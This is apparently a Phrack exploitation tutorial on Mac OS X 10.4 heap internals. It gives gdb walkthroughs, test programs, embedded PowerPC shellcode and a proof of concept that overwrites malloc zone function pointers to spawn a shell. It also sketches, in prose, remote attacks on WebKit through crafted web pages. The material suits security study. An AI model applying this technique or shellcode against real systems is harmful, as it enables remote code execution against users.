==Phrack Inc.== Volume 0xXX, Issue 0xXX, Phile #0xX of 0xXX |=------------=[ Destroying the Apple Heap for Fun & Profit ]=--------------=| |=---------------------------------------------------------------------------=| |=------------------=[ nemo ]=-----------------------=| --[ Table of contents 1 - Introduction 2 - Overview of the Apple OS X userland heap implementation 2.1 - Zones 2.2 - Blocks 2.3 - Heap initialization 3 - A sample overflow 4 - A real life example (WebKit) 5 - Conclusion 6 - References --[ 1 - Introduction. This article comes as a result of my experiences exploiting a heap overflow in the default web browser (Safari) on Mac OS X. It assumes a small amount of knowledge of ppc assembly. A reference for this has been provided in the references section below. (4). the reference section. Also, knowledge of other memory allocators will come in useful, however it's not necessarily needed. All code in this paper was compiled and tested on Mac OS X - Tiger (10.4). --[ 2 - Overview of the Apple OS X userland heap implementation. The malloc() implementation found an Apple's Libc-391 and earlier (at the time of writing this) is written by Bertrand Serlet. It is a relatively complex memory allocator made up of memory "zones", which are variable size portions of virtual memory, and "blocks", which are allocated from within these zones. It is possible to have multiple zones, however most applications tend to stick to just using the default zone. A series of environment variables can be set, to modify the behavior of the memory allocation functions. These can be seen by setting the "MallocHelp" variable, and then calling the malloc() function. They are also shown in the malloc() manpage. The source for the implementation of the Apple malloc() is available from http://www.opensource.apple.com/darwinsource/current.version.number/. (The current version of the source at the time of writing this is 10.4.1). To access it you need to be a member of the ADC, which is free to sign up. (or if you can't be bothered signing up use the login/password from http://bugmenot.com). ;) ----[ 2.1 - Zones. A single zone can be thought of a single heap. When the zone is destroyed all the blocks allocated within it are free()'ed. Zones allow blocks with similar attributes to be placed together. The zone itself is described by a malloc_zone_t struct (defined in /usr/include/malloc.h) which is shown below: [malloc_zone_t struct] typedef struct _malloc_zone_t { /* Only zone implementors should depend on the layout of this structure; Regular callers should use the access functions below */ void *reserved1; /* RESERVED FOR CFAllocator DO NOT USE */ void *reserved2; /* RESERVED FOR CFAllocator DO NOT USE */ size_t (*size)(struct _malloc_zone_t *zone, const void *ptr); void *(*malloc)(struct _malloc_zone_t *zone, size_t size); void *(*calloc)(struct _malloc_zone_t *zone, size_t num_items, size_t size); void *(*valloc)(struct _malloc_zone_t *zone, size_t size); void (*free)(struct _malloc_zone_t *zone, void *ptr); void *(*realloc)(struct _malloc_zone_t *zone, void *ptr, size_t size); void (*destroy)(struct _malloc_zone_t *zone); const char *zone_name; /* Optional batch callbacks; these may be NULL */ unsigned (*batch_malloc)(struct _malloc_zone_t *zone, size_t size, void **results, unsigned num_requested); void (*batch_free)(struct _malloc_zone_t *zone, void **to_be_freed, unsigned num_to_be_freed); struct malloc_introspection_t *introspect; unsigned version; } malloc_zone_t; (Well, technically zones are scalable szone_t structs, typecast to malloc_zone_t, however i will discuss that in 2.3.) As you can see, the zone struct contains function pointers for each of the memory allocation / deallocation functions. This should give you a pretty good idea of how we can control execution after an overflow. ----[ 2.2 - Blocks. Allocation of blocks occurs in different ways depending on the size of the memory required. The size of all blocks allocated is always paragraph aligned (a multiple of 16). Therefore an allocation of less than 16 will always return 16, an allocation of 20 will return 32, etc. The szone_t struct contains two pointers, for tiny and small block allocation. These are shown below: tiny_region_t *tiny_regions; small_region_t *small_regions; Memory allocations of sizes which fall into the "tiny" range are allocated from a pool of vm_allocate()'ed regions of memory. Each of these regions consists of a 1MB, (in 32-bit mode), or 2MB, (in 64-bit mode) heap. Following this is some meta-data about the region. Regions are ordered by ascending block size. When memory is deallocated it is added back to the pool. Free blocks contain the following meta-data: (all fields are sizeof(void *) in size, except for "size" which is sizeof(u_short)). - checksum - previous - next - size (in quantum counts) Memory allocations of "small" range sized blocks, are allocated from a pool of small regions, pointed to by the "small_regions" pointer in the szone_t struct. Again this memory is pre-allocated with the vm_allocate() function. Each "small" region consists of an 8MB heap, followed by the same meta-data as tiny regions. Tiny and small allocations are not always guaranteed to be page aligned. If a block is allocated which is less than a single virtual page size then obviously the block cannot be aligned to a page. This can cause problems when putting shellcode inside a buffer of this size. A SIGBUS can occur when the shellcode is executed. Large block allocations (allocations over a few vm pages in size), are handled quite differently to the small and tiny blocks. When a large block is requested, the malloc() routine uses vm_allocate() to obtain the memory required. Larger memory allocations occur in the higher memory of the heap. This is useful in the "destroying the heap" technique, outlined in this paper. Large blocks of memory are allocated in multiples of 4096. This is the size of a virtual memory page. Because of this, large memory allocations are always guaranteed to be page-aligned and code can safely be injected into large buffers without risk of SIGBUS problems. ----[ 2.3 - Heap initialization. As you can see below, the malloc() function is merely a wrapper around the malloc_zone_malloc() function. void * malloc(size_t size) { void *retval; retval = malloc_zone_malloc(inline_malloc_default_zone(), size); if (retval == NULL) { errno = ENOMEM; } return retval; } It uses the inline_malloc_default_zone() function to pass the appropriate zone to malloc_zone_malloc(). If malloc() is being called for the first time the inline_malloc_default_zone() function calls _malloc_initialize() in order to create the initial default malloc zone. The malloc_create_zone() function is called with the values (0,0) being passed in as as the start_size and flags parameters. After this the environment variables are read in (any beginning with "Malloc"), and parsed in order to set the appropriate flags. It then calls the create_scalable_zone() function in the scalable_malloc.c file. This function is really responsible for creating the szone_t struct. It uses the allocate_pages() function as shown below. szone = allocate_pages(NULL, SMALL_REGION_SIZE, SMALL_BLOCKS_ALIGN, 0, \ VM_MAKE_TAG(VM_MEMORY_MALLOC)); This, in turn, uses the vm_allocate() mach syscall to allocate the required memory to store the s_zone_t default struct. --[ 3 - A Sample Overflow Before we look at how to exploit a heap overflow, we will first analyze how the initial zone struct is laid out in the memory of a running process. To do this we will use gdb to debug a small sample program. This is shown below: -[nemo@gir:~]$ cat > mtst1.c #include int main(int ac, char **av) { char *a = malloc(10); __asm("trap"); char *b = malloc(10); } -[nemo@gir:~]$ gcc mtst1.c -o mtst1 -[nemo@gir:~]$ gdb ./mtst1 GNU gdb 6.1-20040303 (Apple version gdb-413) (gdb) r Starting program: /Users/nemo/mtst1 Reading symbols for shared libraries . done Once we receive a SIGTRAP signal and return to the gdb command shell we can then use the command shown below to locate our initial szone_t structure in the process memory. (gdb) x/x &initial_malloc_zones 0xa0010414 : 0x01800000 This value, as expected inside gdb, is shown to be 0x01800000. If we dump memory at this location, we can see each of the fields in the _malloc_zone_t_ struct as expected. (gdb) x/x (long*) initial_malloc_zones 0x1800000: 0x00000000 // Reserved1. 0x1800004: 0x00000000 // Reserved2. 0x1800008: 0x90005e0c // size() pointer. 0x180000c: 0x90003abc // malloc() pointer. 0x1800010: 0x90008bc4 // calloc() pointer. 0x1800014: 0x9004a9f8 // valloc() pointer. 0x1800018: 0x900060ac // free() pointer. 0x180001c: 0x90017f90 // realloc() pointer. 0x1800020: 0x9010efb8 // destroy() pointer. 0x1800024: 0x00300000 // Zone Name ("DefaultMallocZone"). 0x1800028: 0x9010dbe8 // batch_malloc() pointer. 0x180002c: 0x9010e848 // batch_free() pointer. In this struct we can see each of the function pointers which are called for each of the memory allocation/deallocation functions performed using the default zone. As well as a pointer to the name of the zone, which can be useful for debugging. If we change the malloc() function pointer, and continue our sample program (shown below) we can see that the second call to malloc() results in a jump to the specified value. (after instruction alignment). (gdb) set *0x180000c = 0xdeadbeef (gdb) jump *($pc + 4) Continuing at 0x2cf8. Program received signal EXC_BAD_ACCESS, Could not access memory. Reason: KERN_INVALID_ADDRESS at address: 0xdeadbeec 0xdeadbeec in ?? () (gdb) But is it really feasible to write all the way to the address 0x1800000? (or 0x2800000 outside of gdb). We will look into this now. First we will check the addresses various sized memory allocations are given. The location of each buffer is dependant on whether the allocation size falls into one of the various sized bins mentioned earlier (tiny, small or large). To test the location of each of these we can simply compile and run the following small c program as shown: -[nemo@gir:~]$ cat > mtst2.c #include #include int main(int ac, char **av) { extern *malloc_zones; printf("initial_malloc_zones @ 0x%x\n",*malloc_zones); printf("tiny: %p\n",malloc(22)); printf("small: %p\n",malloc(500)); printf("large: %p\n",malloc(0xffffffff)); return 0; } -[nemo@gir:~]$ gcc mtst2.c -o mtst2 -[nemo@gir:~]$ ./mtst2 initial_malloc_zones @ 0x2800000 tiny: 0x500160 small: 0x2800600 large: 0x26000 From the output of this program we can see that it is only possible to write to the initial_malloc_zones struct from a "tiny" or " large" buffer. Also, in order to overwrite the function pointers contained within this struct we need to write a considerable amount of data completly destroying sections of the zone. Thankfully many situations exist in typical software which allow these criteria to be met. This is discussed in the final section of this paper. Now we understand the layout of the heap a little better, we can use a small sample program to overwrite the function pointers contained in the struct to get a shell. The following program allocates a 'tiny' buffer of 22 bytes. It then uses memset() to write 'A's all the way to the pointer for malloc() in the zone struct, before calling malloc(). #include #include #include int main(int ac, char **av) { extern *malloc_zones; char *tmp,*tinyp = malloc(22); printf("[+] tinyp is @ %p\n",tinyp); printf("[+] initial_malloc_zones is @ %p\n",*malloc_zones); printf("[+] Copying 0x%x bytes.\n", (((char *)*malloc_zones + 16) - (char *)tinyp)); memset(tinyp,'A', (int)(((char *)*malloc_zones + 16) - (char *)tinyp)); tmp = malloc(0xdeadbeef); return 0; } However when we compile and run this program, an EXC_BAD_ACCESS signal is received. (gdb) r Starting program: /Users/nemo/mtst3 Reading symbols for shared libraries . done [+] tinyp is @ 0x300120 [+] initial_malloc_zones is @ 0x1800000 [+] Copying 0x14ffef0 bytes. Program received signal EXC_BAD_ACCESS, Could not access memory. Reason: KERN_INVALID_ADDRESS at address: 0x00405000 0xffff9068 in ___memset_pattern () This is due to the fact that, in between the tinyp pointer and the malloc function pointer we are trying to overwrite there is some unmapped memory. In order to get past this we can use the fact that blocks of memory allocated which fall into the "large" category are allocated using the mach vm_allocate() syscall. If we can get enough memory to be allocated in the large classification, before the overflow occurs we should have a clear path to the pointer. To illustrate this point, we can use the following code: #include #include #include #include char shellcode[] = // Shellcode by b-r00t, modified by nemo. "\x7c\x63\x1a\x79\x40\x82\xff\xfd\x39\x40\x01\xc3\x38\x0a\xfe\xf4" "\x44\xff\xff\x02\x39\x40\x01\x23\x38\x0a\xfe\xf4\x44\xff\xff\x02" "\x60\x60\x60\x60\x7c\xa5\x2a\x79\x7c\x68\x02\xa6\x38\x63\x01\x60" "\x38\x63\xfe\xf4\x90\x61\xff\xf8\x90\xa1\xff\xfc\x38\x81\xff\xf8" "\x3b\xc0\x01\x47\x38\x1e\xfe\xf4\x44\xff\xff\x02\x7c\xa3\x2b\x78" "\x3b\xc0\x01\x0d\x38\x1e\xfe\xf4\x44\xff\xff\x02\x2f\x62\x69\x6e" "\x2f\x73\x68"; extern *malloc_zones; int main(int ac, char **av) { char *tmp,*tmpr; int a=0,*addr; while((tmpr = malloc(0xffffffff)) <= (char *)*malloc_zones); addr = malloc(22); // small buffer. printf("[+] malloc_zones (first zone) @ 0x%x\n",*malloc_zones); printf("[+] addr @ 0x%x\n",addr); if((unsigned int)addr < *malloc_zones) { printf("[+] addr + %u = 0x%x\n",*malloc_zones - (int)addr,*malloc_zones); } printf("[+] Using shellcode @ 0x%x\n",&shellcode); for(a=0; a <= ((*malloc_zones - (int)addr) + sizeof(malloc_zone_t))/ 4; a++) addr[a] = (int)&shellcode[0]; printf("[+] finished memcpy()\n"); tmp = malloc(5); // execve() } This code allocates enough "large" blocks of memory (0xffffffff) with which to plow a clear path to the function pointers. It then copies the address of the shellcode into memory all the way through the zone before overwriting the function pointers in the szone_t struct. Finally a call to malloc() is made in order to trigger the execution of the shellcode. As you can see below, this code functions as we'd expect and our shellcode is executed. -[nemo@gir:~]$ ./heaptst [+] malloc_zones (first zone) @ 0x2800000 [+] addr @ 0x500120 [+] addr + 36699872 = 0x2800000 [+] Using shellcode @ 0x3014 [+] finished memcpy() sh-2.05b$ This method has been tested on Apple's OSX version 10.4.1 (Tiger). --[ 4 - A Real Life Example The default web browser on OSX (Safari) as well as the mail client (Mail.app), Dashboard and almost every other application on OSX which required web parsing functionality achieve this through a library which Apple call "WebKit". (2) This library contains many bugs, many of which are exploitable using this technique. Particular attention should be payed to the code which renders
blocks ;) Due to the nature of HTML pages an attacker is presented with opportunities to control the heap in a variety of ways before actually triggering the exploit. In order to use the technique described in this paper to exploit these bugs we can craft some HTML code, or an image file, to perform many large allocations and therefore cleaving a path to our function pointers. We can then trigger one of the numerous overflows to write the address of our shellcode into the function pointers before waiting for a shell to be spawned. Because of this a crafted email or website is all that is needed to remotely exploit an OSX user. Apple have been contacted about a couple of these bugs. The WebKit library is open source and available for download, apparently it won't be too long before Nokia phones use this library for their web applications. --[ 5 - Conclusion Although this technique seems rather specific, I have already personally seen several various bugs which can be exploited in this manner. When possible to exploit a bug in this way you can quickly turn a complicated bug into the equivilant of a simple stack smash (3). On a side note, if anyone works out why the initial_malloc_zones struct is always located at 0x2800000 outside of gdb and 0x1800000 inside i would appreciate it if you let me know. I'd like to say thanks to my boss Swaraj from Suresec LTD for giving me time to research the things which i enjoy so much. I'd also like to say hi to all the guys at Feline Menace, as well as pulltheplug.org/#social and the Ruxcon team. I'd also like to thank the Chelsea for providing the AU felinemenace guys with buckets of corona to fuel our hacking. --[ 6 - References 1) Apple Memory Usage performance Guidelines: - http://developer.apple.com/documentation/Performance/Conceptual/ManagingMemory/Articles/MemoryAlloc.html 2) WebKit: - http://webkit.opendarwin.org/ 3) Smashing the stack for fun and profit: - http://www.phrack.org/show.php?p=49&a=14 4) Mac OS X Assembler Guide - http://developer.apple.com/documentation/DeveloperTools/Reference/Assembler/index.html?http://developer.apple.com/documentation/DeveloperTools/Reference/Assembler/ASMLayout/chapter_4_section_1.html